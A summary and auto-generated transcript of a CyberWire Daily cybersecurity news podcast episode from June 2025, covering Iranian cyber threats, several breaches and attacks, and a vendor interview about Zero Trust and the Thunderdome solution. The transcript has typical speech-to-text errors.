Iran’s digital retaliation looms. - CyberWire Daily

Summary8 min read

CyberWire Daily Summary: "Iran’s Digital Retaliation Looms" | June 23, 2025

Published on June 23, 2025, by N2K Networks

Introduction

Hosted by Maria Varmazis, the CyberWire Daily podcast delivers essential cybersecurity news and expert analysis. In this episode, titled "Iran’s Digital Retaliation Looms," the discussion centers on the escalating cyber tensions between Iran and the United States, alongside other significant cybersecurity developments worldwide.

Heightened Risk of Iranian Cyber Attacks

Timestamp: 02:30

The U.S. Department of Homeland Security (DHS) has issued a stern warning regarding the increased likelihood of cyber attacks from Iranian actors in response to recent American military strikes on Iran's nuclear facilities. The DHS's National Terrorism Advisory System bulletin highlights:

Potential Targets: Both pro-Iranian hacktivists and government-affiliated cyber actors are expected to target U.S. networks, focusing on poorly secured systems and internet-connected devices.
Expert Insight: John Hultquist, Chief Analyst at Google Threat Intelligence Group, cautions, “Iran has had mixed results with disruptive cyber attacks, and they frequently fabricate and exaggerate their efforts to boost their psychological impact” (02:45).
Impact and Preparedness: While the psychological impact may be amplified, Hultquist emphasizes that the actual consequences could be severe for individual enterprises. Organizations are advised to implement standard ransomware prevention measures to bolster their defenses.

Timestamp: 04:00

Amidst rising tensions between Israel and Iran, cyberspace has become a pivotal battleground:

Israeli Cyber Operations: Israeli-linked hackers have reportedly siphoned over $90 million from Iran's Bank SEPA and Nobatex Exchange, exposing vulnerabilities within financial systems during conflicts.
Iranian Retaliation: In retaliation, Iran has enforced nationwide internet blackouts, significantly disrupting civilian communications and access.
Targeted Infrastructure: Iranian cyber actors are actively targeting critical infrastructure in Israel and potentially the United States, with particular focus on water systems and industrial control environments.
Asymmetric Cyber Strategy: Iran employs an asymmetric approach that leverages disinformation, psychological operations, and surveillance through compromised digital devices.
U.S. Response: Agencies like the Cybersecurity and Infrastructure Security Agency (CISA) are urging increased vigilance and resilience to counter these threats.

This cyber conflict underscores the evolving nature of warfare, where cyber attacks on infrastructure, finance, and information systems yield tangible real-world consequences beyond traditional battlefields.

Global Cybersecurity Incidents

Oxford City Council Data Breach

Timestamp: 05:30

The Oxford City Council in England has disclosed a significant data breach affecting personal information accumulated over two decades. Key points include:

Affected Individuals: Personnel involved in administering elections between 2001 and 2022, including poll station workers and ballot counters, may have had personal details accessed.
Council’s Statement: “We have now identified that people who worked on Oxford City Council administered elections between 2001 and 2022, including poll station workers and ballot counters, may have had some personal details accessed” (05:45).
Current Status: Investigations are ongoing to determine the extent of data accessed or extracted. Fortunately, there is no evidence of mass data downloads.

Europe's Push for Digital Sovereignty

Timestamp: 07:00

In response to concerns over U.S. tech giants' alignment with political interests, European Union leaders are intensifying efforts to achieve digital sovereignty by:

Data Localization: Implementing stricter regulations to ensure European data remains within regional borders.
Cloud Services Regulation: Enforcing more stringent controls over cloud service providers to safeguard European digital infrastructure.
Implications: This move aims to prevent American platforms from potentially prioritizing U.S. political agendas, thereby maintaining European data autonomy and cybersecurity integrity.

Michigan Hospital Network Ransomware Attack

Timestamp: 08:15

McLaren Healthcare, part of Michigan Hospital Network, reported a ransomware attack in August that compromised data belonging to over 740,000 individuals. Details include:

Stolen Data: Names, Social Security numbers, driver's license numbers, medical data, and health insurance information.
Operational Impact: The attack caused significant disruptions to services across 13 hospitals and various medical services in Michigan.
Perpetrators: The Inc Ransomware gang is suspected to be behind the attack.

WrapperBot's Evolution: Targeting DVRs

Timestamp: 09:00

WrapperBot, a botnet initially known for targeting Internet of Things (IoT) devices through Mirai-based command injection exploits, has expanded its focus to digital video recorders (DVRs):

New Vulnerabilities: Exploits known firmware weaknesses in DVRs to execute remote commands and integrate devices into the botnet.
Threat Landscape: The adaptation signifies an increased focus on industrial and surveillance hardware, which are often left unpatched and vulnerable.
Research Findings: Continuous scanning and brute-force attacks on specific DVR brands indicate the botnet's persistent threat, especially to organizations with outdated embedded devices.

CoinMarketCap's Security Flaw

Timestamp: 10:15

A critical vulnerability was identified in CoinMarketCap’s Doodle image upload feature, allowing attackers to execute arbitrary JavaScript via a stored cross-site scripting (XSS) flaw:

Mechanism: Malicious SVG images could bypass sanitation filters, enabling session hijacking, credential theft, or redirection to phishing sites.
Response: CoinMarketCap has patched the vulnerability, highlighting the ongoing security challenges faced by crypto-related platforms with large, targeted user bases.

New Zealand's Minimum CyberSecurity Standard (MCSS)

Timestamp: 11:30

New Zealand's National Cybersecurity Center has mandated the MCSS for all public sector agencies, with compliance required by October 2025. Key aspects include:

Baseline Controls: 19 controls covering asset management, secure configuration, access controls, and incident response.
Objectives: Establish a uniform cybersecurity stance across government entities, emphasizing risk-informed practices and resilience against advanced persistent threats targeting public infrastructure.
Implementation: Agencies must demonstrate progress and measurable security outcomes, reinforcing the government’s commitment to coordinated defense strategies.

Industry Voices: Interview with Imran Umar on Zero Trust and Thunderdome

Timestamp: 12:45

In the Industry Voices segment, host Dave Bittner interviews Imran Umar, Zero Trust Lead at Booz Allen Hamilton, discussing the evolution of Zero Trust frameworks and the innovative Thunderdome solution.

Zero Trust Framework Evolution

Timestamp: 12:56 - 15:34

Imran Umar elaborates on how Zero Trust has transitioned from focusing solely on Enterprise IT to encompassing weapon systems and operational technology (OT):

Broader Application: Zero Trust principles are now being adapted to protect critical infrastructure and weapon systems from cyber threats.
Tailored Solutions: Implementing Zero Trust in OT and defense environments requires customized approaches, differing from traditional IT networks.

Challenges in Implementing Zero Trust

Timestamp: 14:33 - 15:34

Umar identifies the primary challenge in Zero Trust implementation as the data pillar:

Governance and Policies: Establishing standards for data tagging, labeling, and sharing is more challenging than technological implementations.
Non-Technical Barriers: The difficulties lie in governance frameworks rather than in the technology itself, particularly in managing data access and protection policies.

Implementing Zero Trust in OT and Defense Systems

Timestamp: 15:50 - 17:16

Focusing on DoD and OT environments, Umar discusses:

Legacy Systems Vulnerability: Critical infrastructure often relies on outdated systems that are expensive and time-consuming to modernize.
Protective Measures: Emphasizing the need to safeguard critical assets and prevent intrusions into existing legacy systems.
Integration Challenges: Increased IT and OT integration introduces new vulnerabilities, necessitating comprehensive assessments and tailored security measures.

Thunderdome: A Modular Zero Trust Solution

Timestamp: 17:28 - 20:19

Imran Umar introduces Thunderdome, Booz Allen Hamilton’s advanced Zero Trust solution designed for the Department of Defense:

Features: Meets 152 advanced activities outlined by the DoD CIO, supporting both unclassified and classified networks.
Architecture: Boasts an open and modular design, allowing for the integration and interchange of various products and solutions.
Scalability: Thunderdome's multi-tenant architecture enables efficient scaling and management across different domains, including tactical environments.

Flexibility and Customization

Timestamp: 20:41 - 23:53

Umar highlights Thunderdome’s adaptability:

Selective Deployment: Organizations can implement specific capabilities that align with their unique environments without adopting an all-or-nothing approach.
Comprehensive Solutions: Offers modules like Zero Trust Edge, Zero Trust Remote, application security stacks, and advanced visibility and analytics.

Recommendations for Zero Trust Adoption

Timestamp: 21:57 - 24:05

For organizations embarking on the Zero Trust journey, Umar recommends:

Conducting Maturity Assessments: Evaluate current capabilities across different pillars (user, identity, data) to identify gaps and prioritize implementations.
Starting with Identity: Establishing a robust identity solution is foundational, as it integrates seamlessly with other Zero Trust components.
Utilizing Thunderdome: Adopt Thunderdome’s turnkey solutions or engage in tailored deployments through the Zero Trust Accelerator program to streamline implementation.

Success Factors in Zero Trust Implementation

Timestamp: 24:05 - 24:56

Successful organizations typically:

Robust Identity Management: Have strong identity solutions and governance in place, facilitating the integration of additional Zero Trust capabilities.
Integrated Frameworks: Seamlessly incorporate various security measures, such as behavioral analytics and micro-segmentation, into their existing security infrastructure.

Emerging Considerations

Timestamp: 24:56 - 26:36

Umar warns of the challenges associated with data management in Zero Trust environments:

Data Volume: Implementing real-time dynamic access generates vast amounts of data, which traditional Security Information and Event Management (SIEM) systems struggle to handle.
Distributed Defense Architecture: Thunderdome employs a distributed cybersecurity operation model with AI-driven data pipelines, enabling real-time threat detection without overloading centralized systems.
Scalability: Transitioning to a distributed model is essential for managing the increased data flow and maintaining effective security analytics.

International Cyber Incident: Russia's Dairy Industry Disruption

Timestamp: 27:00

A significant cyber attack has crippled Russia's dairy industry by targeting Mercury, the nation’s electronic veterinary certification system. This marks the third such strike on the platform within the year, with the current incident being the most severe. Key impacts include:

Operational Breakdown: Producers have resorted to paper-based certifications, but major retailers like Mirator and Yandex Lavka refuse to accept them due to legal requirements for digital documentation in handling animal products.
Supply Chain Disruption: The outage has led to empty shelves and widespread confusion, as the inability to issue legitimate digital certificates halts the distribution of dairy products.
Regulatory Response: The Soyuz Moloko dairy association criticizes unclear instructions from regulators, exacerbating the confusion.
Recovery Efforts: Restoration of the Mercury system is underway; however, there is no estimated timeline for full recovery, and the perpetrators remain unidentified.

Conclusion

This episode of CyberWire Daily sheds light on the escalating cyber tensions involving Iran, significant data breaches affecting governmental and healthcare institutions, advancements in Zero Trust security frameworks, and notable international cyber incidents disrupting essential industries. The comprehensive analysis underscores the pervasive and evolving nature of cyber threats in today's interconnected world.

For more detailed insights and daily updates, visit CyberWire Daily.

Loading summary

Transcript30 lines

[00:02]
Maria Varmazis
You're listening to the Cyberwire network, powered by N2K.
[00:13]
Dave Bittner
Hey everybody, Dave here. I've talked about Deleteme before and I'm still using it because it still works. It's been a few months now and I'm just as impressed today as I was when I signed up. Deleteme keeps finding and removing my personal information from data broker sites, and they keep me updated with detailed reports so I know exactly what's been taken down. I'm genuinely relieved. Knowing my privacy isn't something I have to worry about every day. The Deleteme team handles everything. It's the set it and forget it peace of mind. And it's not just for individuals. Deleteme also offers solutions for businesses, helping companies protect their employees personal information and reduce exposure to social engineering and phishing threats. And right now, our listeners get a special 20% off your delete me plan. Just go to JoinDeleteMe.com N2K and use promo code N2K at checkout. That's JoinDeleteMe.com N2k code N2K.
[01:26]
Imran Umar
Foreign.
[01:35]
Maria Varmazis
Risk of Iranian Cyber Attacks Cyber warfare has become central to Israel and Iran's strategies Oxford City Council discloses Data breach Europe aiming FOR Digital Sovereignty Michigan Hospital Network says data belonging to 740,000 was stolen by ransomware gang rapper bot pivoting to attack DVRs a picture worth a thousand wallets New Zealand's public sector bolsters cyber defenses on our Industry Voices segment today we are joined by Imran Umar, Zero Trust lead at Booze Allen Hamilton discussing Zero Trust and Thunderdome and a cyber attack spoils Russia's Dairy flu.
[02:25]
Dave Bittner
Foreign.
[02:30]
Imran Umar
Today.
[02:31]
Maria Varmazis
Is Monday, June 23rd, 2025. I'm Maria Varmazes, host of the T Minus Space Daily Podcast in for Dave Bittner and this is your Cyber Wire Intel Briefing. Thanks for joining me this Monday. Let's get into it. The U.S. department of Homeland Security has warned of a heightened risk of Iranian cyber attacks following American military strikes against Iran's nuclear facilities. DHS said in a National Terrorism Advisory System bulletin issued yesterday that low level cyber attacks against U.S. networks by pro Iranian hacktivists are likely and cyber actors affiliated with the Iranian government may conduct attacks against US Networks. The advisory added that both hacktivists and Iranian government affiliated actors routinely target poorly secured US Networks and Internet connected devices for disruptive cyber attacks. John Hultquist, who is the chief analyst at Google Threat Intelligence Group, noted that Iran has had mixed results with disruptive cyber attacks and they frequently fabricate and exaggerate their efforts in an effort to boost their psychological impact. We should be careful not to overestimate these incidents and inadvertently assist the actors. The impacts, he says, may still be serious for individual enterprises, which can prepare by taking many of the same steps that they would to prevent ransomware. In the wake of escalating tensions between Israel and Iran, cyberspace has emerged as a critical battleground. Israel linked hackers have reportedly exfiltrated over $90 million from Iran's Bank SEPA and and nobatex exchange, highlighting vulnerabilities in financial systems during conflict. On the other hand, Iran has retaliated by imposing nationwide Internet blackouts, severely disrupting civilian access and communications. Cyber attacks from Iranian actors, both state linked and hacktivist, are targeting critical infrastructure across Israel and potentially the United States, with water systems and industrial control environments particularly at risk. Iran's asymmetric cyber strategy leans on disinformation, psychological operations and surveillance via compromised digital devices. Meanwhile, US Agencies like CISA are urging heightened cybervilligence and resilience. This conflict underscores the growing use of cyber as both a standalone and complementary theater in modern warfare, where attacks on infrastructure, finance and information can have real world consequences far beyond the battlefield. The Oxford City Council, which is the local government authority for the English city of Oxford, has disclosed a data breach affecting personal information across the past two decades, the council stated. We have now identified that people who worked on Oxford City Council administered elections between 2001 and 2022, including poll station workers and ballot counters, may have had some personal details accessed. The majority of these people will be current or former council officers. The council detected a, quote, unauthorized presence within its network over the weekend of June 7, the statement adds. Investigations continue to identify, as precisely as we can, what was accessed and what, if anything, might have been taken out of our systems. There is no evidence of a mass download or extraction of data. Europe is accelerating efforts to achieve digital sovereignty Amid growing unease over United States tech giants alignment with the Trump administration, EU leaders are pushing for stronger data localization, stricter regulations on cloud services and enhanced protections for European digital infrastructure. The concern is that American platforms may prioritize U.S. political interests, potentially compromising European data autonomy and cybersecurity. This shift comes as US Firms ramp up lobbying and infrastructure investment in Europe even as the transatlantic regulatory divide deepens. Cybersecurity experts see this as a critical juncture for Europe's long term control over its digital landscape and threat resilience. Michigan Hospital Network McLaren Healthcare says information belonging to more than 740,000 people was stolen during a ransomware attack last August, according to the record. The affected data included names, Social Security numbers, driver's license numbers, medical data and health insurance information. McLaren operates 13 hospitals and various medical services across the state of Michigan, and the attack disrupted services at the time. The Inc Ransomware gang is believed to be responsible for the attack. Wrapperbot, which is a Mirai based botnet known for targeting IoT devices, has pivoted towards attacking digital video recorders or DVRs using command injection exploits. The campaign exploits known vulnerabilities in DVR firmware, enabling attackers to execute remote commands and co op devices into a growing botnet. This shift marks an evolution in WrapperBot's capabilities, signaling an expanded focus on industrial and surveillance hardware often left unpatched. Researchers report sustained scanning activity and brute force attacks targeting specific DVR brands. The botnet's modular structure and adaptability make it a persistent threat, especially to organizations with unsecured or outdated embedded devices on their networks. A critical vulnerability was discovered in CoinMarketCap's Doodle image upload feature that could have allowed attackers to execute arbitrary JavaScript in users browsers and this is an example of a stored cross site scripting flaw. Security researchers found that malicious payloads embedded in SVG images could bypass existing sanitation filters if exploited, attackers could hijack sessions, steal credentials or redirect users to phishing sites. CoinMarketCap has since patched this vulnerability, but the incident highlights ongoing risks in user generated content features and the importance of rigorous input validation. It also underscores the security challenges facing crypto related platforms with large, highly targeted user bases. New Zealand's National Cybersecurity center has mandated a Minimum CyberSecurity Standard, or MCSS, for all public sector agencies, with an implementation deadline set for October 2025. The MCSS includes 19 baseline controls covering areas like asset management, secure configuration, access controls and incident response. It aims to establish a consistent cybersecurity posture across government entities, emphasizing risk informed practices and resilience. Agencies must report compliance progress and demonstrate measurable security outcomes. The move follows increasing concerns about advanced persistent threats targeting public infrastructure, reinforcing the government's commitment to baseline hardening and coordinated defense in an evolving threat landscape. Coming up next on our Industry Voices segment, host Dave Bittner sits down with Booz Allen Hamilton's Zero Trust lead Imran Umar Talk about Zero Trust and Thunderdome. Plus a cyber attack brings Russia's dairy supply to a standstill. Stick around.
[10:48]
Dave Bittner
And now a word from our sponsor ThreatLocker. Keeping your system secure shouldn't mean constantly reacting to threats. Threat Locker helps you take a different approach by giving you full control over what software can run in your environment. If it's not approved, it doesn't run. Simple as that. It's a way to stop ransomware and other attacks before they start without adding extra complexity to your day. See how ThreatLocker can help you lock down your environment at www.threatlocker.com compliance regulations, third party risk, and customer security demands are all growing. And Chang is your manual GRC program actually slowing you down? If you've ever found yourself drowning in spreadsheets, chasing down screenshots, or wrangling manual processes just to keep your GRC program on track, you're not alone. But let's be clear, there is a better way. Vanta's trust management platform takes the headache out of governance, risk and compliance. It automates the essentials from internal and third party risk to consumer trust, making your security posture stronger, yes, even helping to drive revenue. And this isn't just nice to have. According to a recent analysis from IDC, teams using Vanta saw a 129% boost in productivity. That's not a typo, that's real impact. So if you're ready to trade in chaos for clarity, check out Vanta and bring some serious efficiency to your GRC game. Vanta GRC how much easier trust can be? Get started@vanta.com cyber.
[12:46]
Maria Varmazis
On our industry Voices segment, Dave Bittner recently spoke with Booz Allen Hamilton's Zero Trust lead Imran Umar about Zero Trust and Thunderdome. Here's their conversation.
[12:57]
Imran Umar
So Zero Trust has definitely evolved. The focus over the last several years has been on Enterprise it. So how do I get my Enterprise IT network moved to a zero trust framework? What we are starting to see now is an emphasis of how the same Zero Trust concept can now be applied to weapon systems and to operational technology. To think of ICS data systems, so how do we take the same concept? Because our adversaries are not only attacking our IT system, but they're attacking critical infrastructure. They're always on the lookout to penetrate our weapon system. So how do we take the same concept of zero trust, the same framework, the same principle that we are starting to apply on enterprise IT networks? How are we now scaling that and deploying that for OT and weapon systems? That does require us to tailor these capabilities because the same set of Zero Trust activities that are relevant for enterprise IT systems may not necessarily be relevant for OT and veterans systems. The DoD, CIO and others in collaboration with companies like New Zealand, we are providing insights and input into what a zero trust framework should look like for other domains like weapon systems and tactical and ot.
[14:16]
Dave Bittner
Well, I definitely want to talk about those challenges of implementing zero trust within the DoD, but before we get there, again, staying a little broader, what are some of the big challenges that organizations face these days when it comes to implementing zero trust?
[14:33]
Imran Umar
Yeah, it's a great question. I mean, the biggest challenge that you're seeing is, you know, most organizations originally, when they got the mandate to start implementing zero trust or they got the requirements, they started doing a maturity assessment. And the assessment is really critical because it tells you where are you in your maturity state across the different pillars, like user, like identity, like data. From there they start building the roadmap and implementation plan. While users have had success across the user pillar, the device pillar, the visibility pillar, a lot of them are struggling with the data pillar. The data pillar continues to be the most elusive, the most challenging. And it's not necessarily a technology problem, it's not a technical problem that most people are running into. The problem is more around governance policies, the standards to which we are going to be tagging and labeling data, having proper attributes to be able to share that data with customers that are actually able to receive that data. So the biggest challenge really, I would say in the summary, is the data pillar.
[15:34]
Dave Bittner
Well, I mean, digging into some of the DoD challenges here. As you alluded to things like weapon systems and OT environments, what are some of the specifics of those needs that can be challenging for implementing zero trust?
[15:51]
Imran Umar
Yeah, if you take a look at like OT system, a lot of our critical infrastructure is very legacy and those systems are extremely vulnerable. And to do modernization across those systems will be very expensive and it will take a large amount of time. So one of the things we are proposing is essentially coming in and basically stopping the bleeding. Right. How do we protect critical assets? How do we stop intrusions into those systems, the legacy systems that are already in place? One of the biggest issue we're running into is because there's more OT and IT integration of these systems, we are opening up new vulnerabilities. So our recommendation has been that for OT systems, you go in, conduct a similar VT assessment. For OT system, New Zealand has built a very robust OT assessment, just like we've done for enterprise IT systems. Apply that and essentially identify your biggest gaps. And most of the gaps are most of the issues that we generally see are, for example, if you're doing upgrades of OT systems, you know, the potentially the Potential of leaving back doors open to vendors or third party suppliers and then an adversary using those backhauls to basically access the OT environment and compromising them. So those could be easily addressed with a lot of the systems of your capabilities that we're deploying today.
[17:17]
Dave Bittner
One of the things that I've heard folks talking about in the DoD space is this Thunderdome solution for folks who aren't familiar with it. Can you describe that for us?
[17:29]
Imran Umar
Absolutely. So Thunderdome is the DISA, DoD DISA and DoD Zero Trust solution. So it started off as a small pilot. DISA asked us to implement the, it was competitively awarded to boot Dallin and we were down selected as part of this award and they asked us to deploy a small instance of Thunderdome, a zero trust solution for DISA at specific location. Since then, we have scaled Thunderdome across multiple different DoD mission partners. It provides the most advanced zero trust solution. It basically meets the 152 advanced activities outlined by DOD CIO. So Thunderdom is the marquee zero trust solution that's available to the entire Department of Defense. It's a very open architecture, it's a very modular architecture, so products and solutions can be interswapped. Thunderdome can also be deployed not only on your unclassed network, but also your classified network. That's what we have deployed today for a lot of our customers. Thunderdome also provides the ability for customers to be able to tailor solutions for different environments. So if somebody wanted to deploy Thunderdome capabilities not just at the enterprise level, but at the tactical level or detail disconnected environment, we have proven that Thunderdome can be deployed across all those different domains.
[18:50]
Dave Bittner
You mentioned that Thunderdome makes or takes advantage of open architecture and a modular approach. What are the specific advantages to coming at the problem with those sorts of capabilities?
[19:06]
Imran Umar
Yeah, GUD is a very complex environment. You know, a lot of customers that we see have, have existing technical stacks that they have spent resources on. So grip and replace, sometimes it's not the answer. So what we have done with Thunderdome is we come in and conduct a rapid zero trust assessment for customers. We are, for example, working with a lot of cocoms right now. And for the state agencies, we come in and start conducting a VT assessment. We take a look at an existing environment, we build an architecture based on Thunderdome principle, which is, you know, the proven architecture, and we basically walk them through as to which capabilities from Thunderdome they can adopt, which capabilities that they already have in place and how those capabilities can connect into Thunderdome. One of the beauties of Thunderdome is it's a multi tenant solution. You build it once and reuse it. So when we're talking about efficiency and scalability, we have the ability to bring on customers onto the Thunderdome solution and provide them the ability to manage it themselves if they choose to. If they want that service to be fully managed by disa, that's also an option. So the multi tenant architecture, the open architecture, has been extremely, extremely helpful for us to scale Thunderdome.
[20:20]
Dave Bittner
Help me understand how folks go about dialing this sort of thing in. I mean everyone's situation is different is Thunderdome. It sounds to me like it's not an all or nothing situation here. Like you're able to kind of pick and choose what things best fit with your specific environment.
[20:42]
Imran Umar
Absolutely. You nailed it. Absolutely. So Dynam is very flexible, modular and people have the ability to pick and choose capabilities. I'll give an example. We have customers, we have several co comms and for state agencies that are immediately interested in our Zero Trust Edge solution. Our Zero Trust Edge solution is very robust, very scalable. It provides conditional access, micro segmentation of user traffic and device traffic. A lot of the customers are very interested in the Zero Trust Edge solution. And we are able to go and deploy the Zero Trust Edge solution into their environment and integrate it into the existing fabric integrated into their identity solution, their endpoint security product, their idp, their sin. Similar to that, we have other pieces of Thunderdome like the Zero Trust remote solution. We have a robust application security stack that protects application workload. And finally we have a very robust visibility and analytics solution that supports providing enterprise level visibility across all the Zero Trust infrastructure.
[21:46]
Dave Bittner
What are your recommendations for organizations who are just starting this Zero Trust journey? I mean, how can they get started without feeling overwhelmed?
[21:58]
Imran Umar
Yeah, I mean the deadline is coming, right? 2027 is the timeline, especially on the DoD side, for agencies to meet their target level activities. So Thunderdome is a turnkey solution that they can adopt. It's very flexible, very cost efficient and you know, it could be tailored to the customer need. So I mean I think number one we would recommend is Thunderdome is the easybody. Now for customers that do want to start from scratch, I think the first thing they need to do is conduct a zero trust assessment. So Disneyland has this program called the Zero Trust Accelerator. The Zero Trust Accelerator program essentially comes in and conducts a deep assessment of the customer's solution. We take input like the customer's Zero Trust plan. If they have built a Zero trust architecture, if they have capabilities in place today, we take all that as input, we plug all that data into our Zero trust automated dashboard and it provides customers a good visual snapshot of where they are across the pillars and then they can decide, hey, do I want to. I'm very mature, somewhat mature in the user pillar. I need to put resources towards the identity pillar, for example. So our accelerator program allows us to quickly provide customers a quick snapshot of where their gaps are. And we have done so many vendor aoa analysis of alternative testing of so many different products, we can provide recommendations and build them or share with them existing blueprints as reference architectures that they can adopt. And then not only that, they can use the Thunderhound vehicle to actually task us to implement the solution for them. So the Thunderhome contract vehicle provides a lot of flexibility. You can adopt the turnkey solution or you can utilize the vehicle to do an acceleration assessment and deploy your tailored solution if that's what you desire.
[23:54]
Dave Bittner
So the organizations who are seeing success here, who are doing a good job implementing this, what are the common elements in their execution?
[24:06]
Imran Umar
I think the customers that are the most successful that we have seen from a zero trust perspective are customers that have already in place a robust identity solution. Because everything kind of starts from identity and have put the right governance around it. And then you can build things, you can build your data tailor, you can build your user inventory, your device inventory, you can build your things like behavioral analytics, micro segmentation. But the success of ESD with most customers is they already have a robust identity capability in place. And then all the other Zero trust capabilities essentially integrate with those identity platforms and helps accelerate their Zero trust journey.
[24:48]
Dave Bittner
All right, well, I think I have everything I need for our story here. Is there anything that I missed, anything I haven't asked you that you think it's important to share?
[24:57]
Imran Umar
I think one gotcha that people may not be aware as they kind of move towards this advanced Zero trust is you're collecting a lot of data from a visibility perspective. Because one of the things that zero trust, what we're doing is we're doing real time dynamic access. So we are looking at user device posture, we're looking at user identity, you're looking at behavioral analytics, we're looking at information in terms of what are they approved, what systems and data are approved for access. Now all of a sudden you're collecting a lot of data. The traditional model, if you look at the visibility analytics pillar, the traditional model has been take all that data and dump it into your sin, your security incident event management tool. Well, that model doesn't scale. That whole centralized model where take all the data from the edge from the enterprise and put it into a central location and go look for signals from a hunt perspective, it's not going to work. So one of the things we've built on Thunderdome is a distributed defense cyber operation architecture where the data just where it is. We're not moving data around, but we have built a smart AI driven data pipeline. And what we're doing is as we're collecting this sensor data, we are transforming that data in line. So we're doing the data enrichment, we're doing the data transformation, we're doing data analytics, we're actually deploying AI models in line so they can detect threats and we're really using our SIEM as our dashboard. So one thing customers do need to watch out for is they will be collecting a lot more log. The traditional centralized DTO model will not work and they need to start moving towards a distributed DTO architecture.
[26:37]
Maria Varmazis
That was Cyberwire host Dave Bittner speaking with Booze Allen Hamilton's Zero Trust lead, Imran Umar about Zero Trust and underdomed.
[27:00]
Dave Bittner
Today's cyber attacks move fast. Your team needs to move faster. That's why CloudRange is redefining cyber readiness with real world AI driven cyber range simulations. Join CEO Debbie Gordon as she shares how organizations are replacing outdated tabletop exercises with live fire training that builds confidence and sharpens response in real time. It's not just training, it's transformation. Listen now and make sure your team is prepared for the threats ahead.
[27:45]
Maria Varmazis
And finally today, a cyber attack has thrown Russia's dairy industry into disarray after hackers brought down Mercury, which is the country's electronic veterinary certification system. It's the third strike on the platform this year alone, but it is easily the worst so far. With the system offline, producers scrambled to issue paper based certificates, only to find that many retailers, including big names like Mirator and Yandex Lavka, wouldn't accept them. And that's because under Russian law, businesses cannot legally handle animal products like milk, eggs or meat without digital documentation. Yeah. The result? A supply chain snarl, empty shelves and plenty of confusion. The dairy association Soyuz Moloko says unclear instructions from regulators aren't helping. Meanwhile, restoration work is underway, but with no timeline for full recovery and no culprit identified, the movement of milk remains on pause for now. For links to all of today's stories, check out our daily briefing@thecyberwire.com and don't forget to check out the Grumpy Old Geeks Podcast, where Dave contributes to a regular segment on Jason and Brian's show every week. And you can find Grumpy Old Geeks, where all of the fine podcasts are listed. And that's the Cyber Wire. We would love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the Show Notes or send an email to cyberwire2k.com we're privileged that N2K Cyberwire is part of the daily routine of the most influential leaders and operators in the public and private sector. From the Fortune 500 to many of the world's preeminent intelligence and law enforcement agencies, N2K makes it easy for companies to optimize your biggest investment your people. We make you smarter about your teams while making your teams smarter. Learn how@n2k.com we're conducting our annual audience survey to learn more about our listeners, and we're collecting your insights until August 31st, 2025. There's a link for you in the show notes N2K's Senior Producer is Alice Carruth. Our Cyber Wire producer is Liz Stokes, remixed by Trey Hester with original music and sound design by Elliot Peltzman. Our executive producer is Jennifer Ivan. Peter Kilpe is our publisher and I'm Maria Varmazis in for Dave Bittner. Thanks for listening. We'll see you tomorrow.
[31:03]
Dave Bittner
Did you know Active Directory is targeted in 9 out of 10 cyber attacks? Once attackers get in, they can take control of your entire network. That's why Sempras created Purple Knight, the free security assessment tool that scans your Active Directory for hundreds of vulnerabilities and shows you how to fix them. Join thousands of IT pros using Purple Knight to stay ahead of threats. Download it now@sempras.com purple-night that's sempress.com purple night.